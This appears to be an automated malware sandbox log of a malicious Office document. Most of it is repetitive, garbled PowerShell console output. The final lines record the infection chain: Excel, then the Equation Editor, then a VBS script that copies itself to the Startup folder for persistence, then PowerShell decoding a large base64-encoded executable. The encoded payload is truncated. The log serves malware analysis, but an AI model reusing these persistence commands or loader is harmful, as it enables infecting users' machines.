Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................L.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................L.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............FL.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............aL.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................L.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................L.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................L.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................L.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................M.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............*M.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............RM.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............mM.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................M.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................M.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................M.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................M.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................N.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............6N.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............^N.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............yN.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................N.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................N.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................N.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................N.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................'...............(.P.....<.......D...............'O.........................~....'.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................'...............(.P.....<.......D...............BO.........................~....'.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................3...............(.P.....<.......D...............lO.........................~....3.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................3...............(.P.....<.......D................O.........................~....3.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?...............(.P.....<.......D................O.........................~....?.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?...............(.P.....<.......D................O.........................~....?.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................K...............(.P.....<.......D................O.........................~....K.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................K...............(.P.....<.......D................P.........................~....K.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................W...............(.P.....<.......D...............5P.........................~....W.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................W...............(.P.....<.......D...............PP.........................~....W.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................c...............(.P.....<.......D...............xP.........................~....c.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................c...............(.P.....<.......D................P.........................~....c.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................o...............(.P.....<.......D................P.........................~....o.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................o...............(.P.....<.......D................P.........................~....o.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................{...............(.P.....<.......D................P.........................~....{.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................{...............(.P.....<.......D................Q.........................~....{.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............AQ.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............\Q.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Q.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Q.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Q.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Q.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................R.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............%R.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............MR.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............hR.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................R.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................R.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................R.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................R.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................S.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............1S.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............YS.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............tS.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................S.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................S.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................S.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................S.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D..............."T.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............=T.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............eT.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................T.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D................T.........................~....#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....<.......D................T.........................~....#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....<.......D................T.........................~..../.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....<.......D................U.........................~..../.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....<.......D................U.........................~....;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....<.......D...............IU.........................~....;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....<.......D...............qU.........................~....G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....<.......D................U.........................~....G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....<.......D................U.........................~....S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....<.......D................U.........................~....S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D................U.........................~...._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....<.......D................V.........................~...._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D...............:V.........................~....k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....<.......D...............UV.........................~....k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....<.......D...............}V.........................~....w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....<.......D................V.........................~....w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................V.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................V.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................W.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................W.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............FW.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............aW.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................W.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................W.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................W.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................W.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................X.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............*X.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............RX.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............mX.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................X.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................X.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................X.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................X.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Y.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............6Y.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............^Y.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............yY.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Y.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Y.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Y.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................Y.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............'Z.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............BZ.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................+...............(.P.....<.......D...............jZ.........................~....+.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................+...............(.P.....<.......D................Z.........................~....+.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D................Z.........................~....7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................7...............(.P.....<.......D................Z.........................~....7.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................C...............(.P.....<.......D................Z.........................~....C.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................C...............(.P.....<.......D................[.........................~....C.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................O...............(.P.....<.......D...............3[.........................~....O.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................O...............(.P.....<.......D...............N[.........................~....O.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................[...............(.P.....<.......D...............v[.........................~....[.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................[...............(.P.....<.......D................[.........................~....[.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................g...............(.P.....<.......D................[.........................~....g.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................g...............(.P.....<.......D................[.........................~....g.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................s...............(.P.....<.......D................[.........................~....s.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................s...............(.P.....<.......D................\.........................~....s.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............@\.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............[\.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................\.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................\.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................\.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................\.........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................].........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............*].........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............R].........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............m].........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................].........................~............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D................].........................~............................................
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\jyrthfdwrg.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGXtf2QAAAAAAAAAAOAAAiELAVAAAEQAAAAGAAAAAAAAAmMAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALBiAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAoYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAACEMAAAAgAAAARAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAASgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADkYgAAAAAAAEgAAAACAAUASDEAANguAAADAAAAAAAAACBgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwGyhKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBsoSgAABnItAABwGihKAAAGbyUAAApyMQAAcBYoSgAABnI/AABwHihKAAAGbyUAAApyQwAAcBcoSgAABnJPAABwHShKAAAGbyUAAApyUwAAcBYoSgAABnJfAABwHChKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwGihKAAAGbyUAAApyeQAAcBooSgAABnKLAABwHihKAAAGbyUAAApyjwAAcBwoSgAABnKhAABwHChKAAAGbyUAAApypQAAcBooSgAABnKxAABwFyhKAAAGbyUAAApytQAAcB4oSgAABnLHAABwFyhKAAAGbyUAAApyywAAcBkoSgAABnLdAABwGyhKAAAGbyUAAApy4QAAcBcoSgAABnLzAABwGChKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNysQAAcBcoSgAABhYoKAAACjoEAQAAHxooKQAACiVy9wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcvsAAHAXKEoAAAYoKwAACgxyBQEAcBsoSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyEQEAcBwoSgAABm8xAAAKEQVyhQEAcB0oSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL3AQBwFihKAAAGF283AAAKDRk4mP3//wlvOAAACnJTAgBwHShKAAAGKAIAACstEglyUwIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcl0CAHAWKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyBQEAcBsoSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcmECAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyawIAcBsoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcm8CAHAZKEoAAAZvMQAAChEJcuMCAHAbKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyVQMAcB4oSgAABnJxAwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcnMDAHAZKEoAAAYXjQYAAAElFnKRAwBwGyhKAAAGohQUFChDAAAKKEQAAApyoQMAcBkoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHK9AwBwGihKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\jyrthfdwrg.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGXtf2QAAAAAAAAAAOAAAiELAVAAAEQAAAAGAAAAAAAAAmMAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALBiAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAoYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAACEMAAAAgAAAARAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAASgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADkYgAAAAAAAEgAAAACAAUASDEAANguAAADAAAAAAAAACBgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwGyhKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBsoSgAABnItAABwGihKAAAGbyUAAApyMQAAcBYoSgAABnI/AABwHihKAAAGbyUAAApyQwAAcBcoSgAABnJPAABwHShKAAAGbyUAAApyUwAAcBYoSgAABnJfAABwHChKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwGihKAAAGbyUAAApyeQAAcBooSgAABnKLAABwHihKAAAGbyUAAApyjwAAcBwoSgAABnKhAABwHChKAAAGbyUAAApypQAAcBooSgAABnKxAABwFyhKAAAGbyUAAApytQAAcB4oSgAABnLHAABwFyhKAAAGbyUAAApyywAAcBkoSgAABnLdAABwGyhKAAAGbyUAAApy4QAAcBcoSgAABnLzAABwGChKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNysQAAcBcoSgAABhYoKAAACjoEAQAAHxooKQAACiVy9wAAcBo